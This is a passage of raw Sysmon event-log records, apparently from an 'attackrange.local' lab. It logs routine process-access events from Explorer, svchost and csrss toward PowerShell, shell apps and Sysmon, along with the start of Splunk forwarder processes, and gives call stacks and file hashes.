10341000x8000000000000000361289Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361288Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16562144C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361287Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361286Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361285Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361284Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361283Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361282Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361281Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361280Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361279Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.958{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361278Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361277Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+1c4d6|C:\Windows\System32\appresolver.dll+22383|C:\Windows\System32\appresolver.dll+1edcc|C:\Windows\System32\appresolver.dll+1ecb7|C:\Windows\Explorer.EXE+5af77|C:\Windows\Explorer.EXE+5ae74|C:\Windows\Explorer.EXE+29f20|C:\Windows\System32\windows.storage.dll+1794c4|C:\Windows\System32\windows.storage.dll+179105|C:\Windows\System32\windows.storage.dll+178fe5|C:\Windows\System32\shcore.dll+326f6|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361276Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+221c5|C:\Windows\System32\appresolver.dll+1edcc|C:\Windows\System32\appresolver.dll+1ecb7|C:\Windows\Explorer.EXE+5af77|C:\Windows\Explorer.EXE+5ae74|C:\Windows\Explorer.EXE+29f20|C:\Windows\System32\windows.storage.dll+1794c4|C:\Windows\System32\windows.storage.dll+179105|C:\Windows\System32\windows.storage.dll+178fe5|C:\Windows\System32\shcore.dll+326f6|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361275Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361274Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3433-6013-2303-000000001100}9268C:\Windows\system32\conhost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361273Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2303-000000001100}9268C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+21ee8|C:\Windows\System32\appresolver.dll+1ef46|C:\Windows\system32\twinui.pcshell.dll+1f5b4|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361272Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2303-000000001100}9268C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+1ee93|C:\Windows\system32\twinui.pcshell.dll+1f5b4|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361271Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2303-000000001100}9268C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+221c5|C:\Windows\System32\appresolver.dll+1edcc|C:\Windows\system32\twinui.pcshell.dll+1f5b4|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361270Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:25.943{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2303-000000001100}9268C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032967Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3706-6013-7F03-00000000A401}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032966Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032965Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032964Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032963Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032962Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-3706-6013-7F03-00000000A401}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032961Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3706-6013-7F03-00000000A401}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032960Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.835{FF16AF91-3706-6013-7F03-00000000A401}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032959Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.319{FF16AF91-3706-6013-7E03-00000000A401}23206924C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 